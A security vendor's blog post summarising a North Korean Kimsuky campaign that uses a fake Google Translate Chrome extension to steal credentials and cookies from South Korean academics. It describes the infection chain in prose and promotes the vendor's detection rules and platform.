Kimsuky APT Attack Detection: North Korean Hackers Abuse the TRANSLATEXT Chrome Extension to Steal Sensitive Data

[post-views]
July 03, 2024 · 3 min read
Kimsuky APT Attack Detection: North Korean Hackers Abuse the TRANSLATEXT Chrome Extension to Steal Sensitive Data

The nefarious North Korea-linked threat actor known as Kimsuky APT group uses a novel malicious Google Chrome extension dubbed “TRANSLATEXT” for cyber espionage to illicitly collect sensitive user data. The observed ongoing campaign, which started in the early spring of 2024, is primarily targeting South Korean academic institutions. 

Detect Kimsuky Campaign Leveraging TRANSLATEXT

Seeing the APT threat is on the rise due to intensifying geopolitical tensions, security professionals should stay on top of potential attacks using next-gen tools for advanced threat detection & hunting. 

Rely on SOC Prime Platform for collective cyber defense to proactively identify suspicious activity linked to APTs, including the latest cyber espionage campaign by Kimsuky leveraging a malicious TRANSLATEXT extension to obtain access to sensitive data. Below, you can find a dedicated Sigma rule by our keen Threat Bounty developer Sittikorn Sangrattanapitak, aimed at checking the installation of the malicious Chrome extension.

Possible Kimsuky TRANSLATEXT Targeting South Korean by Detection of Associated Commands (via cmdline)

The rule is compatible with 27 SIEM, EDR, and Data Lake solutions and mapped to MITRE ATT&CK® framework. Additionally, the detection is enriched with relevant metadata and CTI references to streamline threat investigation. 

Security professionals seeking more detection content linked to Kimsuky APT can access the broader Sigma rules stack aggregated in the Threat Detection Marketplace. Just hit the Explore Detection buttons below and immediately drill down to the rule collection, with new detections being added daily.

Explore Detections

Whether you’re a seasoned Threat Hunter, DFIR expert, Sigma rules specialist, or SOC Analyst eager to contribute to the collective good, you can join SOC Prime’s world’s first detection engineering crowdsourcing initiative. Become a Threat Bounty Program member to unleash your personal talent, improve detection engineering & threat hunting skills, expand technology expertise, and obtain financial benefits for your contribution.

Attack Analysis Linked to Kimsuky Using TRANSLATEXT Chrome Extension

Since early spring 2024, Zscaler ThreatLabz has been keeping an eye on the ongoing offensive activity linked to the Kimsuky APT gang targeting the South Korean academic industry sector, specifically focused on political research related to North Korea. Kimsuky, a hacking group based in North Korea and tracked under the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, or TA406, has been notorious for over a decade for conducting cyber espionage and financially motivated attacks aimed at South Korean entities. In the latest campaign, adversaries weaponize a harmful Google Chrome add-on called TRANSLATEXT, which is disguised as Google Translate, to collect email addresses, credentials, or cookies, and capture browser screenshots from web browsers. 

In the first decade of March 2024, Kimsuky uploaded TRANSLATEXT to their GitHub repository under their control. This extension bypasses security measures for major email providers to extract sensitive information. 

The attack flow starts with a ZIP archive disguised as containing Korean military history data. The archive contains two files: a document in the Hangul Word Processor format and an executable file. Running the executable file triggers the download of a PowerShell script from an adversary server. The latter then sends information about the compromised victim to a GitHub repository and downloads further PowerShell code using an LNK file.

Defenders recommend avoiding installing programs from untrusted sources to mitigate the risks related to the latest Kimsuky campaign. This is imperative for remaining cyber vigilant and preventing potential data breaches. Stay ahead of emerging threats and future-proof your organization’s cybersecurity posture by leveraging SOC Prime’s complete product suite for AI-powered Detection Engineering, Automated Threat Hunting, and Detection Stack Validation. 

Table of Contents

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts